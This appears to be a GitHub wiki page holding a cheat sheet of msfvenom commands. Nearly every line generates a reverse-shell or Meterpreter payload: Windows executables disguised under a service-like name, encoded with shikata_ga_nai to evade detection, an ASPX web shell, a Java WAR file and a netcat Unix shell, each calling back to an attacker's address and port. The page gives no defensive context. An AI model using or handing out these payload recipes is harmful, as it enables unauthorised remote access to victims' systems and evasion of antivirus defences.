-
Notifications
You must be signed in to change notification settings - Fork 14
MSFVenom
Alvin Smith edited this page Sep 18, 2021
·
19 revisions
https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/
msfvenom -p windows/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe -o ASCService.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -e x86/shikata_ga_nai -f exe -o ASCService.exe
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST="ip" LPORT=4242 -f aspx > shell.aspx
msfvenom -p java/shell_reverse_tcp lhost=10.10.0.1 lport=4321 -f war -o pwn.war
msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R
msfvenom --list payloads
msfvenom -l | grep windows
msfvenom --list | grep powershell
https://security.stackexchange.com/questions/130256/what-is-shikata-ga-nai